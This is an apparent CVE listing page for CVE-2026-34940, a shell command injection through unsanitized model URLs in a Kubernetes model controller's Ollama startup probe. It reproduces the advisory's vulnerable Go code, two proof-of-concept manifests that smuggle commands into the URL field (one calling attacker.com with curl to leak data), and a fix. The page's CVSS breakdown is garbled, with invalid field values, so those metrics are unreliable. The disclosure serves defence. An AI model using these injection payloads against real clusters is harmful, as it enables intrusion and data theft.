What is CVE-2026-34940?

## CHAMP: Description ### Summary The `ollamaStartupProbeScript()` function in `internal/modelcontroller/engine_ollama.go` constructs a shell command string using `fmt.Sprintf` with unsanitized model URL components (`ref`, `modelParam`). This shell command is executed via `bash -c` as a Kubernetes startup probe. An attacker who can create or update `Model` custom resources can inject arbitrary shell commands that execute inside model server pods. ### Details The `parseModelURL()` function in `internal/modelcontroller/model_source.go` uses a regex (`^([a-z0-9]+):\/\/([^?]+)(\?.*)?$`) to parse model URLs. The `ref` component (capture group 2) matches `[^?]+`, allowing any characters except `?`, including shell metacharacters like `;`, `|`, `$()`, and backticks. The `?model=` query parameter (`modelParam`) is also extracted without any sanitization. **Vulnerable code** ([permalink](https://github.com/kubeai-project/kubeai/blob/ba1824e8c1d70c9092b6c0a48199bba3b8973fee/internal/modelcontroller/engine_ollama.go#L185-L196)): ```go func ollamaStartupProbeScript(m *kubeaiv1.Model, u modelURL) string { startupScript := "" if u.scheme == "pvc" { startupScript = fmt.Sprintf("/bin/ollama cp %s %s", u.modelParam, m.Name) } else { if u.pull { pullCmd := "/bin/ollama pull" if u.insecure { pullCmd += " --insecure" } startupScript = fmt.Sprintf("%s %s && /bin/ollama cp %s %s", pullCmd, u.ref, u.ref, m.Name) } else { startupScript = fmt.Sprintf("/bin/ollama cp %s %s", u.ref, m.Name) } } // ... return startupScript } ``` This script is then used as a `bash -c` startup probe ([permalink](https://github.com/kubeai-project/kubeai/blob/ba1824e8c1d70c9092b6c0a48199bba3b8973fee/internal/modelcontroller/engine_ollama.go#L108-L112)): ```go StartupProbe: &corev1.Probe{ ProbeHandler: corev1.ProbeHandler{ Exec: &corev1.ExecAction{ Command: []string{"bash", "-c", startupProbeScript}, }, }, }, ``` **Compare with the vLLM engine** which safely passes the model ref as a command-line argument (not through a shell): ```go // engine_vllm.go - safe: args are passed directly, no shell involved args := []string{ "--model=" + vllmModelFlag, "--served-model-name=" + m.Name, } ``` **URL parsing** ([permalink](https://github.com/kubeai-project/kubeai/blob/ba1824e8c1d70c9092b6c0a48199bba3b8973fee/internal/modelcontroller/model_source.go#L229-L270)): ```go var modelURLRegex = regexp.MustCompile(`^([a-z0-9]+):\/\/([^?]+)(\?.*)?$`) func parseModelURL(urlStr string) (modelURL, error) { // ref = matches[2] -> [^?]+ allows shell metacharacters // modelParam from ?model= query param -> completely unsanitized } ``` There is no admission webhook or CRD validation that sanitizes the URL field. ### PoC **Attack vector 1: Command injection via `ollama://` URL ref** ```yaml apiVersion: kubeai.org/v1 kind: Model metadata: name: poc-cmd-inject spec: features: ["TextGeneration"] engine: OLlama url: "ollama://registry.example.com/model;id>/tmp/pwned;echo" minReplicas: 1 maxReplicas: 1 ``` The startup probe script becomes: ```bash /bin/ollama pull registry.example.com/model;id>/tmp/pwned;echo && /bin/ollama cp registry.example.com/model;id>/tmp/pwned;echo poc-cmd-inject && /bin/ollama run poc-cmd-inject hi ``` The injected `id>/tmp/pwned` command executes inside the pod. **Attack vector 2: Command injection via `?model=` query parameter** ```yaml apiVersion: kubeai.org/v1 kind: Model metadata: name: poc-cmd-inject-pvc spec: features: ["TextGeneration"] engine: OLlama url: "pvc://my-pvc?model=qwen2:0.5b;curl${IFS}http://attacker.com/$(whoami);echo" minReplicas: 1 maxReplicas: 1 ``` The startup probe script becomes: ```bash /bin/ollama cp qwen2:0.5b;curl${IFS}http://attacker.com/$(whoami);echo poc-cmd-inject-pvc && /bin/ollama run poc-cmd-inject-pvc hi ``` ### Impact 1. **Arbitrary command execution** inside model server pods by any user with Model CRD create/update RBAC 2. In multi-tenant Kubernetes clusters, a tenant with Model creation permissions (but not cluster-admin) can execute arbitrary commands in model pods, potentially accessing secrets, service account tokens, or lateral-moving to other cluster resources 3. Data exfiltration from the model pod's environment (environment variables, mounted secrets, service account tokens) 4. Compromise of the model serving infrastructure ### Suggested Fix Replace the `bash -c` startup probe with either: 1. An exec probe that passes arguments as separate array elements (like the vLLM engine does), or 2. Validate/sanitize `u.ref` and `u.modelParam` to only allow alphanumeric characters, slashes, colons, dots, and hyphens before interpolating into the shell command Example fix: ```go // Option 1: Use separate args instead of bash -c Command: []string{"/bin/ollama", "pull", u.ref} // Option 2: Sanitize inputs var safeModelRef = regexp.MustCompile(`^[a-zA-Z0-9._:/-]+$`) if !safeModelRef.MatchString(u.ref) { return "", fmt.Errorf("invalid model reference: %s", u.ref) } ```

What is the severity of CVE-2026-34940?

CVE-2026-34940 has a CVSS v3 score of 8.8, which is classified as High severity.

Is there an exploit available for CVE-2026-34940?

Yes, there are known exploits available for CVE-2026-34940. Immediate patching is recommended.

Is there a patch available for CVE-2026-34940?

Yes, patches are available for CVE-2026-34940. Check the vendor advisories for update instructions.

CVE-2026-34940 - CVE Details, Severity, and Analysis

Severity Scores

CVSS v38.8

CVSS v20.0

Priority Score809.0

EPSS Score0.0

High

Exploitation LikelihoodMinimal

0.00%EPSS

Very low probability of exploitation

Monitor and patch as resources allow

0.00%

EPSS

8.8

CVSS

Yes

Exploit

Yes

Patch

Medium Priority

exploit exists

EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.

Description

CHAMP: Description

Summary

The ollamaStartupProbeScript() function in internal/modelcontroller/engine_ollama.go constructs a shell command string using fmt.Sprintf with unsanitized model URL components (ref, modelParam). This shell command is executed via bash -c as a Kubernetes startup probe. An attacker who can create or update Model custom resources can inject arbitrary shell commands that execute inside model server pods.

Details

The parseModelURL() function in internal/modelcontroller/model_source.go uses a regex (^([a-z0-9]+):\/\/([^?]+)(\?.*)?$) to parse model URLs. The ref component (capture group 2) matches [^?]+, allowing any characters except ?, including shell metacharacters like ;, |, $(), and backticks.

The ?model= query parameter (modelParam) is also extracted without any sanitization.

Vulnerable code (permalink):

func ollamaStartupProbeScript(m *kubeaiv1.Model, u modelURL) string {
    startupScript := ""
    if u.scheme == "pvc" {
        startupScript = fmt.Sprintf("/bin/ollama cp %s %s", u.modelParam, m.Name)
    } else {
        if u.pull {
            pullCmd := "/bin/ollama pull"
            if u.insecure {
                pullCmd += " --insecure"
            }
            startupScript = fmt.Sprintf("%s %s && /bin/ollama cp %s %s", pullCmd, u.ref, u.ref, m.Name)
        } else {
            startupScript = fmt.Sprintf("/bin/ollama cp %s %s", u.ref, m.Name)
        }
    }
    // ...
    return startupScript
}

This script is then used as a bash -c startup probe (permalink):

CVSS v3 Breakdown

Attack Vector:Network

Attack Complexity:Local

Privileges Required:Local

User Interaction:Network

Scope:Unchanged

Confidentiality:High

Integrity:High

Availability:High

Exploit References

GitHub

Patch References

Security [email protected]

Ready for Agentic Automated Testing?

CVE-2026-34940

CHAMP: Description

Summary

Details

PoC

Impact

Suggested Fix